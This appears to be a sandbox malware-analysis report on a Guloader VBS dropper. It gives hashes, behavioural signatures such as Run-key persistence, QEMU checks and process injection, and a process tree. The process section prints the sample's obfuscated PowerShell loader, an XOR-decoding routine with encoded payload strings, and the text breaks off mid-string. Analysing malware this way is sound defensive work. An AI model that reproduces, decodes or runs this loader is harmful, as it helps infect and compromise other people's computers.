Analysis
max time kernel: 149s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230221-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230221-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/03/2023, 07:27
Static task: static1
Behavioral task: behavioral1
  Sample: f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs
  Resource: win10v2004-20230221-en
General
Target: f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs
Size: 1.5MB
MD5: d432507a249248cf6a2518b733d86eed
SHA1: 3619c2d2075b8e8f7f5d2592570acbedd08ee572
SHA256: f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02
SHA512: 6df2a45c4fad337f5064a02f58b1648d38aa7381fad6d930b9237a9e5f83956b3330c4fabaf023fa85c29a45a2285823ce0c11a9de01826fd743f99786f0f833
SSDEEP: 24576:ujEdPGRMK/6avBiw2OuR+9BxV6lcgQ1QRbAGw:8FRMCieuR+nb9N
Malware Config
Signatures

Guloader, Cloudeye
A shellcode based downloader first seen in 2020.

Adds policy Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \Registry\User\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | chkdsk.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ELYTS = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe" | chkdsk.exe

Blocklisted process makes network request (1 IoCs)
flow | pid | Process
3 | 2244 | WScript.exe

Checks QEMU agent file (2 TTPs, 2 IoCs)
Checks presence of QEMU agent, possibly to detect virtualization.
description | ioc | Process
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | powershell.exe
File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | ieinstal.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | WScript.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Key created | \Registry\User\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | chkdsk.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
pid | Process
5056 | ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
pid | Process
3316 | powershell.exe
5056 | ieinstal.exe

Suspicious use of SetThreadContext (3 IoCs)
description | pid | Process | procid_target
PID 3316 set thread context of 5056 | 3316 | powershell.exe | 96
PID 5056 set thread context of 756 | 5056 | ieinstal.exe | 25
PID 2064 set thread context of 756 | 2064 | chkdsk.exe | 25

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (1 IoCs)
pid | pid_target | Process | procid_target
3312 | 4204 | WerFault.exe | 106

Enumerates system info in registry (2 TTPs, 1 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | chkdsk.exe

Modifies Internet Explorer settings
description | ioc | Process
Key created | \Registry\User\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | chkdsk.exe

Suspicious behavior: EnumeratesProcesses (38 IoCs)
pid | Process
3812 | powershell.exe (2 entries)
3316 | powershell.exe (2 entries)
5056 | ieinstal.exe (8 entries)
2064 | chkdsk.exe (26 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
756 | Explorer.EXE

Suspicious behavior: MapViewOfSection (8 IoCs)
pid | Process
3316 | powershell.exe (1 entry)
5056 | ieinstal.exe (3 entries)
2064 | chkdsk.exe (4 entries)

Suspicious use of AdjustPrivilegeToken (18 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3812 | powershell.exe
Token: SeDebugPrivilege | 3316 | powershell.exe
Token: SeDebugPrivilege | 5056 | ieinstal.exe
Token: SeDebugPrivilege | 2064 | chkdsk.exe
Token: SeShutdownPrivilege | 756 | Explorer.EXE (7 entries)
Token: SeCreatePagefilePrivilege | 756 | Explorer.EXE (7 entries)

Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
756 | Explorer.EXE (2 entries)

Suspicious use of WriteProcessMemory (15 IoCs)
description | pid | Process | procid_target
PID 2244 wrote to memory of 3812 | 2244 | WScript.exe | 86 (2 entries)
PID 3812 wrote to memory of 3316 | 3812 | powershell.exe | 88 (3 entries)
PID 3316 wrote to memory of 5056 | 3316 | powershell.exe | 96 (4 entries)
PID 756 wrote to memory of 2064 | 756 | Explorer.EXE | 104 (3 entries)
PID 2064 wrote to memory of 4204 | 2064 | chkdsk.exe | 106 (3 entries)
Processes

C:\Windows\Explorer.EXE (process tree depth 1)
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID: 756

C:\Windows\System32\WScript.exe (process tree depth 2)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f82a9123c20e9be0f923ead031d0a19f077427acbea78a462b9c5e1e2a3a6c02.vbs"
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unacknowledgements = """ FFuInKc tAiMoFnU PSo lFyGg rBaDpBh i ctaWl lCyR0t A{ Q n pNabrAa m (U[HS t rMi n g ] `$gOMxPafm iCdS1Q0S4U) ; M`$ JLe r nEiGnAdPu sGtUr i e n s K=S NSeDwS- OSbKj e cCt HbEy tCe [P] C(S`$ O xSaHm iSdA1B0 4 .RLBe nKgStihM S/ H2F)G;u T M H cFWoArS(O`$ FOe npcIiSnNgHsS=l0P; `$HF eSnAcSi n g sE -El t `$ ODxPa mRipdR1 0A4F. LMeSn gVt h ;f T`$ FDe n cDiSnAgNs + =K2 )S{M F `$KU r oGc eVr i dGa eC =B C`$VOFxOaHm i d 1D0H4 .MSAufbSsNtDrDiHnDg ( `$ FPe nUcUi nBg sy,V O2F)D;l F e G A B C `$SJfe rAn idnFdmuLs tor i eFn sN[B`$ FAeEnAcLiKnEg sJ/A2C]P S=A R[ cPo nPv e r t ] :B: T o BPy t eU( `$KU rKo c e rsi dta eM,S M1U6 )B;B F `$UJ esrPn iPnId uIs t rHiLe n s [b`$TFFefnScCiHnEgSs /M2V] =P b(A`$mJ eBrOnSiUn dEuFsCt rGiSe nMs [R`$UF eSn c i nGgasA/K2 ] - b x o rV 2 4C7V)F;D U A L }B [SS t r iSnHgs]F[ SKyDs t e m .RT eFxCt . EVnKc oOdkiSnUg ] :D: ADSpC IrIA. G e tJS t roisnSgS( `$ Jae r n iBn d uOsTtUrLiOe nUsO)s;R}T`$ BKuBgsvSgBsT0I= P o lRy g raaFpHh iDc aSlTlOyF0F 'TAI4 8tEZ8I4 8 3E9A2D9IA D 9 9 3 9HBv9RBP'k;A`$KBFuSg v gKsA1U= P oMl y g r a p h iMcOa l lDys0 'OBAAK9EEd9H4 8 5B9 8 8 4 9 8S9 1H8D3AD 9SAG0S9OE 9K9 CS4RCD5 DP9PAB2 9S9T8S4b9 6 9H1W9H2AB 9 9R6 8 3N9 EF8D1F9 2MBLAE9 2K8r3 9 Ff9 8E9K3C8P4 'C;C`$KBVu g v gfs 2t=SP o lSy g r afpHhriScFaBl lPyS0 'RB 0R9s2P8T3 AA7P8 5B9 8C9u4PB 6 9F3 9R3A8S5 9 2S8R4F8 4 'Q; `$ BGuPgSvMg s 3K=UP oDlPyFgBr aNpMhUiLcSaRl lGy 0 B'SA 4 8TES8P4I8 3 9B2E9 A DP9 AF5B8 2A9 9S8 3G9UE 9 AR9 2EDS9 B E 9B9S8 3 9 2Q8S5D9B8 8M7PAT4 9S2B8R5B8F1 9 EV9T4 9U2F8L4KDs9RBUFJ9K6 9 9 9B3B9YBL9 2AAH5 9 2I9 1F'v;u`$ B uIg vMgPs 4P=SP o lGyTgBr aUpUhFiUcOaOlTlByg0V ' 8R4V8D3B8F5A9 E 9 9 9S0M' ; `$ B u g vMgVs 5 =SPCo l yGgPriaKpBhSi c aAl lLy 0a B'ABP0S9P2I8A3SB A 9S8 9S3A8V2A9 BE9G2 B FA9S6 9b9 9 3 9 BR9T2U'P; `$IB utg vNgMs 6 =CPOoKl y gPr aPp hFi cAa lAlSy 0 'LA 5KAP3 AA4K8 7U9C2 9B4C9 ES9m6B9DB B 9W9 6 9IAU9N2 DVBND 
7GBnFB9PE 9 3d9O2 B 5 8 ETAb4 9sEA9 0 DOBGD 7KAS7T8L2L9 5I9 BF9KE 9 4F' ;G`$SB uFgSv g sK7 =CP o lSyRg r a p hTiScSa lOlVy 0M O'UA 5U8D2 9F9 8 3 9 ES9CA 9A2EDAB D 7IB A 9 6I9 9 9S6 9P0U9 2U9F3K' ; `$OB u gAv gGs 8 =DP o l yMg r adp hPi c a ltl yD0S L'PA 5P9J2S9 1U9 B 9S2A9R4S8 3 9I2Q9R3SBR3O9 2T9NB 9B2 9W0 9R6 8 3 9S2f'B;C`$ B uAg v gFsb9 = P o lSy g rSa pRh igcSaTlNl y 0i C' BUED9A9BBIAK9 2 9rA 9 8r8L5S8BE B A 9G8U9P3 8 2S9BB 9A2 'S; `$ SLlDaSmtb aFdTeMsR0D= P oLlPy g r a pVhPiEcNa lSl y 0D 'SBCAB8 EPB 3V9u2D9TB 9 2Z9R0 9 6 8M3 9w2 AA3M8TE 8 7C9 2A' ;D`$ S lOaOm b aSdFeTsS1 = PUoAlTyDg r aSpShUiScGa lSl y 0 R'FB 4R9TBS9R6E8 4 8S4 DBB DM7RAP7 8 2 9S5R9PB 9 E 9S4PD BCDw7SA 4B9P2 9O6h9IBB9S2c9 3MDFB DB7RBM6 9 9 8U4B9FECB 4C9LB 9 6B8 4P8S4 DPBSD 7OBN6C8D2 8F3K9N8UB 4 9EBP9N6 8 4 8 4O' ; `$ S l aRmMbcaUd e sC2U=NP oIlBySgBr aLpMh iScmaMlSl yT0 C' BKEP9T9 8B1P9S8H9 C 9S2 'K;A`$AS l aKmDb aSd e sU3 = P oNlOySgAr a pchEi cEa lSlPy 0B S' AS7U8W2b9D5P9aBU9 EF9B4AD BTD 7GBTFI9FER9 3A9s2cBA5 8TE A 4T9 E 9O0 D BSD 7 BL9p9D2 8K0 A 4 9TBT9A8P8B3UD B D 7 AD1 9 EC8A5I8T3X8S2P9T6 9 B ' ;I`$ STl aImFb a dEepsA4 =FP oSlGy g r aMp hRiPc aMl lByE0B 'wA 1 9FES8S5S8 3M8E2L9 6S9 B B 6 9 BB9 B 9B8R9 4M'H;P`$ S lLaDmCbia d eVsR5 =VP o lryMgMrSaMpPh iAcPa lAl y 0S t' 9k9 8P3M9S3 9 BA9SBB'S;A`$TS lSa m b a d e sV6A=EPUoWlUyMg r a pIhAiScTa l lSy 0A B'IBP9 8U3 AP7V8I5A9 8 8M3 9 2 9k4 8 3DAT1 9TE 8 5D8 3b8r2h9 6 9 B B AU9R2 9RAB9 8E8H5M8 ES' ; `$IS l aAm b aidSeRsD7P= PPoOlCy g rBaRpSh i c aklBl yS0 A'LBIEOB 2VA FK'D; `$GS l aBmAbAahdOePsT8 =CP oSlUyOg r a p hCi cBa l lSyA0a ' AdBB' ;L`$VNFo n dJebsktgr uBcdtWi o n = P oUl y gerRa p h iIcNaBl l yu0 P'DAu2hAb4 BK2UAp5SCH4LCC5 ' ; `$ P o l i tAiRaUkStAiRo nGePr = P oTlSyIgPr aNp h iLc a lPlByE0 G'pBD4 9L6 9 BT9 B AH0O9 Ec9H9P9S3B9A8 8c0FA 7E8 5 9C8D9 4MBF6P'p;mf uSnScTtMiAo n FfUk ps b{ P aSrOaUm T( `$IB e tKaCgVe dSe sO,i `$ J oNnPaMt abnW)S A R d ; `$MR e t tSiPgphAeSdHs t aPbAsB0P =BPVoSl yUgFrEa p hVi cRaTlPl yR0 V'sDB3 B FS9V2F9 9u8T0 9CE 8 
4 9 2 D 7 C A DN7SD F A C BS6U8A7 8R7CB 3S9S8 9 Ar9F6L9 EV9I9 A A CUD CHD BV4 8 2F8M5 8B5 9 2 9 9 8U3 B 3I9F8F9PAd9P6S9AE 9P9 DG9UBS0R9C2P8u3OB 6H8B4 8S4S9 2O9 A 9S5 9 BF9 EP9 2H8 4sDAF D EEDA7A8WBID 7 A 0E9WF 9 2c8V5 9C2ADMAdB 8D9H5 9GDI9K2S9B4S8 3TDS7b8SCAD 7ADI3 A 8 D 9aBM0P9ABS9G8L9 5 9n6 9PB BN6 8S4K8 4G9 2 9NA 9M5G9IBf8NECBB4F9C6c9S4E9TFH9T2PDS7DD A BA6 9 9 9S3SDR7GD 3JA 8 D 9DBFB 9 8S9O4S9 6H8 3 9TEK9U8 9 9 DW9AAM4S8 7O9dBM9RE 8 3DD F DH3uA 4 9PB 9K6O9 AO9K5P9G6K9 3 9O2E8 4DC F D EUAMC D AHCD6 A A D 9sBP2 8F6D8 2 9V6P9 BP8 4 DeF D 3 B 5 8 2 9B0 8B1 9O0 8G4 C 7SD EBDP7 8AAODSE D 9 BG0 9 2 8C3 AZ3V8AE 8A7I9P2SDHFPDF3CB 5T8P2 9a0L8S1 9 0 8 4MCF6TDVEC'B;S&e(U`$HSAlHa mFb aSdme s 7R)A `$RRNe t t iMgMhNe d sPt a b s 0 ;S`$LRDe tSt iEgshOerd sUt aUb sC5E H=R TPSoUlJyBg rbaApUh ifc aSl lMy 0P 'ODS3 B 0L9TBU9C6 8 4E8B5t9I8 9 2B8R5gD 7 CkAND 7 DG3 BJF 9 2M9B9E8M0B9GES8 4F9 2SDF9rB 0 9F2 8C3kB AW9P2P8 3J9DFg9 8U9T3BDEF DS3MBT5 8P2U9S0 8S1 9 0 8E4 C 5AD BMDP7TABCTA 3 8PEB8 7 9 2 A COA AVAWAWD 7FBS7QD F D 3TBS5h8f2D9S0 8 1 9 0 8D4PCa4WDUBPDP7 D 3GB 5 8S2B9 0 8 1K9r0 8 4SC 3vD E DAEH' ;s&P(O`$DSSl aDmmbAaDd e se7D)m T`$YRme t tLiRgMh e d s t a bMs 5P; `$ RpeAt t iGgCh e d sjtIaIbHs 1 =S BPFoRlEy gbr aipphbiSc a lBl y 0S 'K8C5 9 2 8W3Z8 2S8 5 9C9 D 7 DL3 B 0 9SB 9 6E8 4 8M5 9D8D9D2 8 5UD 9YBFES9R9S8 1T9 8T9UCI9M2RDTF D 3 9 9M8B2 9BB 9UB D BsD 7BB 7 DKF A CJAP4H8 Et8U4C8S3M9R2 9 ASDt9RAS5U8A2 9 9 8 3E9FEI9RAP9M2ADS9AB ED9T9F8S3I9v2r8D5P9N8 8k7AAa4C9s2H8P5s8 1p9PE 9D4g9 2C8R4LD 9 BCFi9 6S9N9R9T3 9LB 9H2 AT5 9O2L9E1UAHAFDBF B 9 9A2S8U0GDTA BC8T9 5 9WD 9 2U9 4S8 3 DD7EAL4 8AER8 4 8 3P9 2U9NA DK9 A 5u8 2 9G9 8V3C9SEB9 AU9 2SDS9 BDED9 9 8E3 9 2U8T5 9 8S8T7SAh4 9 2E8M5 8 1 9 EK9 4 9T2P8 4LDG9 BKFM9L6H9S9F9 3b9UBN9U2SAS5 9 2C9I1 DUFLDSFKBT9H9 2G8K0 DSAHB 8N9F5M9LDR9A2 9u4E8M3DD 7DBIE 9 9L8 3RA 7R8C3D8S5FDCE DIB DU7MDSF DA3 B Fl9 2S9 9 8 0F9 EG8J4 9N2BD 9 B 0 9K2D8i3 B A 9D2U8A3 9TF 9R8S9O3 DTFGD 3 B 5 8 2S9M0G8 1P9P0M8 4PCD2 DPESD ESD 9hB ET9T9P8 1 9S8 9 C 9 2KD F D 3 9F9 8A2F9 
BS9HBDD BPDT7 B 7 DRF D 3BBT5M9L2 8U3P9F6 9t0D9B2 9 3N9F2P8 4PDTElDBECDCE D EED BKD 7EDA3RBPD 9 8B9F9T9 6G8 3p9 6P9 9uDSE DCE ' ;l& (i`$DSClSa m bLaEd e s 7 )H F`$CR eRtUtMiPg hFeSdKs tBaSb s 1B;S}Nf uEnFc tRiUoHn UGFD TS M{CPia rKaTm (E[ P a r a m eFtHe r ( PDo s iBtoiPo n H=S L0 , MHaUnRdDa tNoarTyP F=L U`$ T r u e ) ] [FTKy pDeD[o]P] `$ATUr i p yFrdeLnBoGu s ,P[PPVa rSaBm eFtSeWrR(HP oas iBtPiMo n =G B1R)S]F E[CTAy pAeT]L B`$ J a gBt fKaHlVk e nSelsZ =L [ VAoMildU] )F; `$ R e t tSiNg hNebd s t aFb s 2A =S PPOo lBy g r a pjhCiVcKa l l yB0 S' DT3 BC9A9 6T8 3P8 2S8 5E9IB 9BES9 0 9AFE9 2U9 3S9B2E8 5GDB7MCBA D 7DAFCFBJ6R8t7 8t7SB 3S9U8 9wAm9 6S9 EI9 9IA A CFD C DBB 4F8C2 8U5 8O5 9 2 9L9 8 3aBG3 9 8U9 AP9T6V9bEO9R9 DN9 Bs3C9K2C9O1 9 Ef9 9S9C2CB 3M8 EM9S9 9O6 9PAA9 EH9F4 BA6C8F4 8M4S9 2A9PA 9r5Y9MBP8 ESD FADRF B 9T9S2 8t0 DCA BF8 9T5O9FD 9B2 9 4W8 3iDF7SA 4u8FE 8p4A8O3i9s2 9GA D 9DA 5S9 2 9C1P9TBP9 2r9M4C8H3Z9 ES9B8G9f9EDU9SB 6 8 4 8U4 9N2L9HA 9 5N9 BO8SE BS9A9P6P9BA 9S2GDCFCDF3 BH5 8 2 9U0D8C1O9C0K8 4BCFFBDDEIDPE D BNDK7UA CtA 4 8VE 8S4T8 3F9 2 9 A DI9JAs5N9S2A9 1a9SB 9 2 9 4M8A3S9HE 9B8H9 9TDR9 BH2 9TA 9zET8 3 D 9OB 6M8D4 8 4 9m2 9 Aa9k5 9aBD8FE BH5 8o2 9 EB9 BS9E3 9M2 8 5sB 6G9 4k9L4S9 2M8C4M8F4 AUAtCYDFC D A 5C8H2G9S9UDSEOD 9 BM3 9 2 9l1 9 E 9 9F9 2 BK3 8PEv9 9 9 6G9DAV9OE 9S4 B AU9 8U9B3B8 2O9 B 9 2 DRFVDS3 Bc5 8 2P9B0 8 1O9 0 8C4 C EHDSB D 7MDS3 9S1 9 6 9IB 8E4 9 2 DPEAD 9LB 3S9 2O9 1 9 ED9 9 9v2CA 3 8 E 8 7H9U2 D FSD 3TA 4M9 B 9T6 9FAF9D5 9L6B9R3 9 2U8S4UC 7TDIB DG7BDO3SA 4 9PBI9S6I9 AF9D5 9 6 9 3C9 2 8 4 C 6SDFBCDS7 A CsA 4O8CE 8G4 8H3 9 2F9TA D 9 BRA 8 2 9 BA8O3R9NE 9P4 9 6 8D4 8I3 Bc3 9 2 9 B 9 2 9I0p9r6 8U3 9U2BA APDhEP' ;L& (F`$ S lMaTm b aed e sA7 )M `$SRBe ttt iNgMhPe d sLtUaFbFsD2D; `$IRVeUt t ihg hIe dFsDt a b s 3O =S PFoSl y g rIa pDhOi cAa lGlSyK0 'SD 3 BH9 9W6 8A3O8 2 8A5 9NB 9EE 9 0B9FF 9 2H9o3 9L2K8i5 DS9AB 3c9A2 9F1R9 ES9 9 9 2PBb4A9 8D9T9F8P4M8 3T8H5 8P2H9D4 8M3 9U8t8 5 D FKD 3 BS5I8K2I9B0E8 1A9S0 8 4 CF1EDBBIDR7SAIC AT4R8EEO8A4 8L3d9Z2 9SAVD 9 
AE5B9 2 9 1S9FBR9B2 9V4I8 3L9 ED9S8 9T9BD 9 BC4 9 6 9SB 9 BP9NEU9a9 9 0 BO4 9 8R9 9G8F1 9r2 9B9A8F3N9GE 9K8 9P9 8 4DA AFCGDMC DCA 4 8 3A9A6A9 9 9 3D9 6K8T5 9 3ED BFDM7 DE3TA 3M8O5O9AES8G7S8REK8 5R9D2 9N9C9P8 8N2M8 4HDDEgD 9 A 4w9 2S8M3 BPER9 AT8R7S9KB 9 2v9cA 9T2B9 9 8F3J9n6 8P3D9AEO9 8 9P9KB 1n9uBU9 6J9F0 8 4 DRF Dp3CBF5p8 2G9 0B8 1R9P0B8 4OC 0 DlEA'I; & (L`$ S lHaSm b aEdFeRs 7 ) `$ RFeCt t iKg hMeTdUs t aSbSs 3U;O`$AR e t tTiRghh eOd spt aGbTs 4H = PKo lLymgTr aMp hSiTc aTl l yD0L G' D 3FBR9 9N6S8 3S8B2K8S5U9uBJ9AEP9 0S9 FI9 2 9 3T9c2B8 5SDS9 B 3U9 2C9W1O9NEU9b9C9 2MBsA 9 2E8 3A9BFD9 8T9 3KD F D 3 A 4U9 B 9S6F9BAc9 5Y9S6K9 3F9K2S8 4 C 5ID BKD 7 DN3AA 4T9 BB9U6I9 AM9D5 9C6B9D3R9R2A8 4 CK4VDEBSD 7MDg3EBEDG9 6 9S0 8 3N9 1 9 6T9LB 9 CM9H2P9D9 9U2f8 4 D BcD 7CDV3 A 3 8E5D9 EG8Z7D8dE 8 5 9 2T9 9 9B8M8F2g8 4 D ECDK9RA 4L9T2N8D3DBFE 9 AP8D7N9BBK9P2O9PAH9 2E9S9F8 3D9P6T8e3 9gE 9 8K9K9 B 1D9NB 9A6D9L0A8S4FDPFTDS3OBS5Z8D2F9N0 8P1 9 0M8S4 CH0PDTEm'S;F&I( `$cSRlPaPmSb aSd eRsF7A)Q t`$IRSeWtSt iLgDh e dSs t aPb sH4 ;K`$DRSeUt tCiRg hKePdpsPtKa bnsW5 =a TPFoAlSy gDrFaCpDhRikcDa l l y 0E o' 8M5 9N2S8 3 8E2M8S5 9t9VD 7RD 3HBA9A9 6U8 3K8 2G8 5S9 B 9OE 9U0M9EF 9 2 9c3F9C2S8P5BD 9 BR4 8e5 9 2p9 6B8V3 9G2KAB3J8sES8 7B9 2 D FKDUE 'C; &R(H`$ SOlUa mabMa dGeCs 7R)F T`$MRHe t t i g hSeBdEsUtpaGbssP5 K H;u} `$ P aVnBtSe f o r sPk rCiIvDn iAnAg sO E=F BP oAlSyHgDr aUpSh iKcvaClil yD0B 'G9CCB9H2 8 5t9 9e9D2N9VB CL4DCO5Z' ;W`$KR eRtOtFi g hpeFdGsTtsaObUs 6 = P oPlUyOg rTaSp hBi c aUl l yE0 C' Dh3KASE 8 1S9T8 9 9 9 9 9V6DDt7FCCABDH7 A CSA 4 8 EA8 4F8C3 9h2 9FA DS9HAU5s8 2 9 9 8S3 9FEp9FA 9 2ADD9SBNEs9B9O8 3I9E2B8C5T9T8 8E7PA 4 9M2M8B5K8 1 9 EG9U4A9 2S8P4RDV9 B AF9 6h8s5 8M4H9AFU9 6 9 BCABAACLDOCUD BP0A9F2L8R3HBH3B9G2F9 BD9 2 9A0K9S6M8N3s9 2TB 1 9 8v8 5 B 1D8 2A9S9E9H4C8E3 9 E 9A8t9 9DAP7h9U8 9 EB9 9 8A3A9P2S8s5BDKF DCFU9J1 9WCI8P7 DC7FDB3 A 7B9F6P9 9S8E3 9B2R9S1 9s8I8N5U8 4T9BCS8 5l9 EE8A1T9 9 9FEU9 9F9 0T8 4 D 7ADS3TAD4 9 BF9E6D9 AS9F5L9 6 9G3D9O2c8 4 CB3 D E DSBRDA7 D FPBT0HBF3 AD3SD 7 B 7 
DmFSA CPBRED9G9E8F3 AB7E8B3T8 5 ASADDRBPD 7EA C AP2 BBE 9 9R8 3pCM4ACA5UANA DDBODL7FA C AU2MBOER9L9 8 3TCN4pCM5MA A D BKD 7 A C A 2CBKEB9 9E8E3FCL4 CC5AA AAD EADO7 D F A CSBRE 9B9F8G3FA 7 8M3D8L5NAPA D ENDIE DOE 'C; & (S`$ S lPa mPbCaodSeJs 7f) s`$LRKeEt tUiSgFhDeSd s tEaRb sT6S;e`$SSae mSilfOo rSm eSdG B=U fekBpM P`$TSTlbaGm b aUd e sU5E P`$ SEl a m bAahdce s 6 ;D`$SR eAtDtSiLg h e d s tSa b s 7F = BP oPlIy gGrLaHpnh i cSaAl lQyA0O 'SDU3TA 2 9E3 8 3 8 5 8UEC9LCC8 4G9K1C9S8 8B5N9SAP9 2 8L4SC 4bDA7 C A Df7 D 3EA Eh8 1S9H8T9E9I9N9 9L6 D 9AB EC9A9 8S1G9 8S9OCS9M2UDUFAA CTB EB9 9P8L3 AV7P8R3 8r5 AhA C D C D AADF9O2 8 5G9T8 D B DU7CCA1 C 3 CD2ND BUDI7 C 7 8KFTCC4CCC7HCE7GC 7UD BLD 7 CA7B8 FSCH3 Cp7FDEEM'A;A& ( `$MSAlMaPmMbSa dle s 7 ) S`$MRPeMtStKiUg hFeBd sSt aSbOsG7P;P`$ R eOt tCi gBhMe d s t aDb sG8I = DP oRl yTg r aMpyhKi c aNl lFy 0 U'OD 3WBP6 9 9T8 3G9 ET9M5N9 E 9S8G8U3V9 E 9MCA9D6S8 4 DF7jCBAGDA7UDK3 ASEI8T1L9C8O9 9 9 9A9O6UDS9UB E 9f9O8S1A9 8 9 CF9s2 DBF A C BBES9S9A8 3MA 7 8A3p8L5TARAJC D C DRARDr9 2A8 5 9P8 DBBGDV7 CRFDCM0RCU6 C 2 C 3FCF1GCHF C FMDuBFD 7 CG7D8 FSCA4 Ct7bCD7BC 7 D BMDr7 C 7M8NFKC 3 D EU'P;b&H( `$KSalka m bVa dAe sN7R)F `$BRReWtmt iPgNhMe dPsMt a bWsT8C; `$KUKd tSr yFkTsPfSoSrAm e sT0H0U=G' HUK CPUH:B\ SLogrAoIs pGh eFrGe \ LHa bNoCr aSnNt emrDs ' ; `$ USdIt rlyWkRs fUoUrhmBeDsS0T1U s=DP oNl yRg rMa p h iPcSaSl l yM0 U'IDE3MBDB 9 EI9UB 9RD 9C6SCIAMD F B 0P9 2 8 3DD A BREp8C3S9P2 9AAmA 7H8 5D9F8 8R7 9g2S8 5V8 3r8HE DC7BDIASAw7V9C6 8 3P9OFFDL7BDc3 A 2 9T3S8 3K8S5 8 ES9PCE8e4 9 1K9M8 8 5 9 A 9F2K8 4CCL7 CF7EDFEAD 9TA 4S9 2B9ABS8a1 9 1R9PB 9 2E9EBR8R4 9F2i' ;H&E( `$iSRlLaTmCbFa deeJsi7 ) C`$ ULd tPr y k sPfSoPr maeAs 0H1 ; `$ RfeCtEtSiPgAhUeDdBsGt a b s 9K L= TPMo lEyNgCrpaFpLh i cAa lil y 0C B' D 3FAs5 9V2H8S3 8 3 9 E 9 0e9fFC9O2f9 3 8 4 8M3 9F6L9R5 8 4CDn7 C A D 7 A CVA 4U8 EM8P4 8F3 9S2B9 A D 9 BT4 9s8 9 9A8P1P9S2E8 5I8A3 AFAAC D CODSB 1 8 5 9 8 9OABBR5J9 6 8A4E9v2 C 1BCO3JAO4 8 3 8O5 9tEW9A9 9 0KD FMD 3CBRBD9MET9 BF9MDQ9 6GD E ' ;B&P(B`$ SNl a 
mHb a dGeCsI7F)S `$PRPeFt t i gshSeHdGs t aBb sT9r; `$ LUiSlAj a 0C = DPBo lGyPg rSa pTh i cda lLlSyU0D c' A COA 4 8 Eh8 4p8S3A9L2 9RA DB9SA 5 8S2 9 9 8o3S9MEO9KAH9 2ZDG9WB E 9 9K8 3M9 2t8o5 9D8T8S7 AU4M9P2S8 5 8N1H9DEV9K4 9S2F8E4TD 9TBFAP9 6S8T5 8 4T9 F 9S6S9 BMADAOCMD C D BR4 9S8 8H7g8 END FID 3 A 5W9L2a8 3T8 3 9CE 9 0A9TF 9 2C9U3 8I4 8 3 9 6R9 5L8A4XD BDD 7 C 7 DSBTD 7ODL7ADA3 AP2R9M3 8 3T8Z5 8DE 9 C 8 4 9 1 9E8G8P5A9 Ap9D2I8D4 CD4DDUBFDS7SC 1FCS3TC 2ID E ' ;I&L(U`$ S lCaLm b aBd eAsO7R)F H`$MLPi lLj a 0d;A`$ Muu hRa m eBdTaGnSe rLeFnI= `$ RueOtOtGiBgThee dPsBt aTbss . cKoCuRn tR- 6C4 5T;K`$OLsiDl j aS1 D=I P o lUyHgmr aHp h i cbablDlEy 0A 'OA CAAA4A8 ES8 4p8 3 9 2H9RAPDW9 Az5 8N2 9H9 8 3 9 EM9 AG9V2 DT9HB E 9 9F8P3 9C2 8 5S9H8D8 7BAM4R9I2 8 5 8 1V9 E 9I4T9k2 8H4 DK9hB AV9S6 8 5 8J4u9OFM9 6R9 BaA A CPDBCBD BI4r9 8 8 7S8BE DFFIDS3 AT5l9 2D8R3T8A3G9HE 9D0 9RFO9B2D9P3S8A4i8T3 9S6 9 5F8 4DD B D 7MCB1TC 3ACS2ND BdD 7 D 3PBW6 9P9 8 3C9 EC9A5T9 ET9 8D8 3 9 EF9 CM9J6 8S4 DNB DO7SDV3 BFA 8c2 9 FC9S6 9 Al9 2 9S3B9S6 9B9T9 2 8l5O9 2T9H9 D E 'S;A& ( `$HSUl aFm bFaCdDe sB7F) `$ LJi lCjGa 1P;F`$GL iUlRjBa 2 H=D OP oHlByKgkr a pAh iSc ablTl y 0 P' DT3SBS6G9ABA8S4D8H3a9U2B9 3 DO7OCFAAD 7BA CBAD4 8ME 8C4T8 3P9B2K9 A DT9TA 5H8R2 9C9 8P3K9 E 9RA 9A2zD 9 B E 9N9M8 3U9L2P8B5B9s8T8 7 A 4T9 2D8 